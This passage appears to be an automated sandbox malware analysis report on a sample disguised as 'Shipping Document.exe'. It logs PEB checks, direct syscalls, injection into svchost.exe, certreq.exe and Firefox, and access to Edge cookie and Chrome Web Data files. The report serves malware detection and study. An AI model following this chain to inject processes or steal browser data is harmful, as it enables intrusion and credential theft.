            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_010181F7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00FEA395
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FEA364 SetUnhandledExceptionFilter,1_2_00FEA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtClose: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\certreq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeThread register set: target process: 3652Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeThread APC queued: target process: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 308008Jump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01018C93 LogonUserW,1_2_01018C93
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00FC3B4C
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00FC4A35
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01024F21 mouse_event,1_2_01024F21
            Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeProcess created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_010181F7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01024C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_01024C03
            Source: Shipping Document.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Shipping Document.exe, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000000.1575167368.0000000001970000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3983455529.0000000001971000.00000002.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000000.1743027988.0000000001890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE886B cpuid 1_2_00FE886B
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00FF50D7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01002230 GetUserNameW,1_2_01002230
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00FF418A
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00FC4AFE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
